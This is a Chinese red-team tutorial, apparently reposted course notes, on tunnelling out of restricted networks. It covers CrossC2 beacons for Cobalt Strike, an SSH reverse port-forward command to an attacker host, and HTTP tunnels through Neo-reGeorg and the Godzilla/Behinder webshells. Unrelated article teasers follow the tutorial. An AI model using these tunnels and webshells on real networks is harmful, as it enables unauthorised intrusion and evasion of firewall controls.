内网对抗-隧道技术篇防火墙组策略HTTP反向SSH转发出网穿透CrossC2解决方案

知识点:

1、C2/C2上线-CrossC2插件-多系统平台支持
2、隧道技术篇-应用层-SSH协议-判断&封装&建立&穿透
3、隧道技术篇-应用层-HTTP协议-判断&封装&建立&穿透

在这里插入图片描述
隧道技术主要解决网络通讯问题:遇到防火墙就用隧道技术,如果没有防火墙纯内网就用socks代理。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

一、演示案例-C2上线-多平台系统-CrossC2项目&Linux&Mac&IOS&Android

该插件目前支持Linux&Mac上线(IOS&Android暂未支持,未来版本支持)
https://github.com/gloxec/CrossC2

使用参考:
https://gloxec.github.io/CrossC2/zh_cn/
目前版本只支持反向的https和正向的tcp

1、下载对应版本加载器和CNA插件

在这里插入图片描述

2、上传加载器文件和本地加载CNA插件

在这里插入图片描述
在这里插入图片描述

3、修改CNA插件配置路径

在这里插入图片描述

4、使用命令或插件绑定HTTPS监听器生成

一、插件绑定HTTPS监听器生成(修改cna配置文件的情况下)

在这里插入图片描述
在这里插入图片描述

二、命令(未修改cna配置文件的情况下)

插件绑定HTTPS监听器生成木马,就会有条命令,复制这个命令在攻击机终端生成即可
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、演示案例-隧道技术-SSH转发-出站限制&信息收集

在这里插入图片描述

SSH 隧道搭建内网穿透:(解决目标出站限制做信息收集)
注:windows也可以支持ssh,需要单独安装该服务罢了。
由于CS无SSH协议监听器配置,无法上线cs。

1、环境复现搭建

如:模拟Linux为被控机,配置防火墙策略
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */如:模拟Windows为被控机,配置防火墙策略:SSH 22端口放行自己的服务器记得开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

2、适用场景

内网主机防火墙限制了出网协议,可以利用SSH转发流量实现内网穿透

3、需要条件:(解决目标出站限制)

被控主机需支持SSH协议(Windows需要安装支持软件)
将2.22上80端口流量转发到xx.xx上的1234端口(xx.xx就是攻击机)
ssh -CfNg -R 1234:192.168.2.22:80 root@xx.xx.xx.xx

在这里插入图片描述
攻击机上:

curL http://127.0.0.1:1234

在这里插入图片描述

三、演示案例-隧道技术-HTTP反向-出站限制&信息收集&上线

在这里插入图片描述

情况1-HTTP隧道搭建内网穿透:(解决目标出站限制做信息收集)

一、项目Neo-reGeorg(把数据封装成http/https隧道)

https://github.com/L-codes/Neo-reGeorg

1、设置密码生成(aspx|ashx|jsp|jspx|php)并上传

python neoreg.py generate -k password

在这里插入图片描述
在这里插入图片描述

2、使用 neoreg.py 连接 WEB 服务器,在本地建立 socks5 代理

python3 neoreg.py -k password -u http://xx/tunnel.php

在这里插入图片描述
在这里插入图片描述

3、Proxifier添加socks5服务器并配置连接规则测试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、哥斯拉&冰蝎-内网穿透

哥斯拉:HttpProxy

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

冰蝎:内网穿透

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

情况2-HTTP隧道搭建上线C2:(解决目标出站限制上线C2)

太多时候遇到目标不出网了,TCP、ICMP、DNS协议均不通,
无法直接与公网的CS/MSF/Sliverd等其他C2服务端建立连接。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
使用HTTP隧道上线c2没什么必要,直接用正反向上线就行(正反向能上线,那么http隧道也能上线,正反向不能上线,http隧道也不能上线)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/384142.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

深入分析 Android ContentProvider (五)

文章目录 深入分析 Android ContentProvider (五)ContentProvider 的性能优化和实践案例1. 性能优化技巧1.1. 数据库索引优化示例:添加索引 1.2. 批量操作与事务管理示例:批量插入操作 1.3. 使用异步操作示例:使用 AsyncTask 进行异步查询 1.…

手持式气象检测设备:便携科技,气象探测

一、手持式气象检测设备:小巧身躯,大能量 手持式气象检测设备,顾名思义,是一种可以手持操作的气象监测工具。它集成了温度、湿度、气压、风速风向等多种传感器,能够实时获取气象数据,并通过显示屏或手机APP…

如何快速抓取小红书帖子评论?两大实战Python技巧揭秘

摘要: 本文将深入探讨两种高效的Python方法,助您迅速获取小红书文章下方的所有评论,提升市场分析与用户洞察力。通过实战示例与详细解析,让您轻松掌握数据抓取技巧,为您的内容营销策略提供有力支持。 如何快速抓取小…

上传项目到GitHub

上传项目到GitHub 前期工作:创建GitHub仓库 1.使用git命令初始化文件夹 git init2.将文件夹里面所有的文件添加到本地仓库,如果想添加单个文件,将.换成文件名就好。 git add .3.给文件备注,双引号里面是文件备注的内容 git c…

监控系列(八)部署dameng_exporter并对接prometheus

一、下载dameng_exporter采集器 官网地址:https://github.com/gaoyuan98/dameng_exporter DM数据库适配prometheus监控的采集器,目前已支持DM8数据库同时提供grafana 8.5.X 以上版本的监控面板(其他的grafana版本需要自己绘制表盘&#xff…

Nginx 如何处理 WebSocket 连接?

🍅关注博主🎗️ 带你畅游技术世界,不错过每一次成长机会! 文章目录 Nginx 如何处理 WebSocket 连接?一、WebSocket 连接简介二、Nginx 处理 WebSocket 连接的基本原理三、配置 Nginx 支持 WebSocket 连接四、Nginx 中的…

MATLAB基础:数据和变量

今天我们开始学习MATLAB基础知识 1、常用非运算符及其作用 1、“,” 作为程序运行的分隔符,起到分隔语句的作用 2、“;” 同样作为分隔符,与“,”不同的是“;”会在程序运行时隐藏该行语句 如下图: 3、“...” 三个英文句点表示续行符…

【SpringBoot教程:从入门到精通】掌握Springboot开发技巧和窍门(四)-Vue项目配置环境、导航栏

主要写前端页面,采用vue框架写页面的导航栏!!! 文章目录 前言 Vue项目配置环境 安装依赖 创建菜单 总结 前言 主要写前端页面,采用vue框架写页面的导航栏!!! Vue项目配置环境 安装…

{Spring Boot 原理篇} Spring Boot自动装配原理

SpringBootApplication 1,Spring Boot 应用启动,SpringBootApplication标注的类就是启动类,它去实现配置类中的Bean的自动装配 SpringBootApplication public class SpringbootRedis01Application {public static void main(String[] args)…

AvaloniaUI的学习

相关网站 github:https://github.com/AvaloniaUI/Avalonia 官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome IDE选择 VS2022VSCodeRider 以上三种我都尝试过,体验Rider最好。VS2022的提示功能不好,VSCode太慢&#xff0c…

构建基于Spring Boot的SaaS应用

引言 在设计和实现SaaS系统时,安全性是至关重要的考虑因素。一个全面的安全策略不仅能保护系统免受恶意攻击,还能确保用户数据的机密性、完整性和可用性。本文将探讨在SaaS架构中实现数据加密、敏感信息保护以及应用安全的最佳实践和技术方案&#xff0…

前端知识笔记之HTML

1.标签元素与属性,注意事项 2.多级标签排序List,无顺序(Ul)和有顺序(Ol) 3.HTML页面结构 4.页面跳转,注意#是统一页面的跳转 5.图片、视频、音频 标签 6.前端表单与后端方法 数据接收的demo 7.常见表单项 8.注意日期类…

html+css 实现水波纹按钮

前言:哈喽,大家好,今天给大家分享htmlcss 绚丽效果!并提供具体代码帮助大家深入理解,彻底掌握!创作不易,如果能帮助到大家或者给大家一些灵感和启发,欢迎收藏关注哦 💕 文…

虚拟机配置RabbitMQ集群教程

RabbitMQ是常用的一款消息中间件,那么如何在我们虚拟机中创建其集群呢?跟着博主这篇文章让你一步到位 本篇搭建的是三台机器为一个集群!假设大家虚拟机都为初始化状态,从0开始(注意集群搭建需要CentOS8以上环境&#x…

Wordpress安装到win10(2024年7月)

目录 1.wordpress介绍 2下载应用 2.1.wordpress 2.2XAMPP 2.3 PHPmyadmin 3.配置应用 3.1XAMPP进程 3.2 文件配置 3.3 phpmyadmin配置 4.配置网页 4.1 数据库创建 4.2 安装wordpress 5.进入面板 6.总结 1.wordpress介绍 WordPress是一个开源内容管理系统&#xff0…

新校区,新视野——广州六中以太彩光打造智慧教育新高地

广州市第六中学总务处 林继青 广州市第六中学是拥有85年办学历史的著名市重点中学,也是广东省首批一级学校和国家级示范性高中。作为广州市首批智慧校园建设示范单位,广州第六中学在从化、花都新建校区的智慧校园建设中“破旧立新”,让先进的以太全光技术与学校新校区建设同频共…

华为Ascend C算子开发(中级)考试

华为Ascend C算子开发(中级)考试题 提示:这个是河北廊坊Ascend C算子开发考试题和答案,仅供参考,因为不确定其他城市的考试题是否也是一样 文章目录 华为Ascend C算子开发(中级)考试题一、op_ho…

MySQL数据库练习(5)

1.建库建表 # 使用数据库 use mydb16_trigger;# 表格goods create table goods( gid char(8) primary key, name varchar(10), price decimal(8,2), num int);# 表格orders create table orders( oid int primary key auto_increment, gid char(10) not null, name varchar(10…

Mybatis-plus自动生成MVC架构

系列文章目录 目录 系列文章目录 文章目录 前言 核心特性 一、mybatis-plus插件介绍 二、使用步骤 1.下载插件 2.读入数据 总结 前言 MyBatis-Plus(简称 MP)是一个基于 MyBatis 的增强工具包,旨在简化开发流程并提高开发效率。以下…

Pytorch使用教学6-张量的分割与合并

在使用PyTorch时,对张量的分割与合并是不可避免的操作,本节就带大家深刻理解张量的分割与合并。 在开始之前,我们先对张量的维度进行深入理解: t2 torch.zeros((3, 4)) # tensor([[0., 0., 0., 0.], # [0., 0., 0., 0.…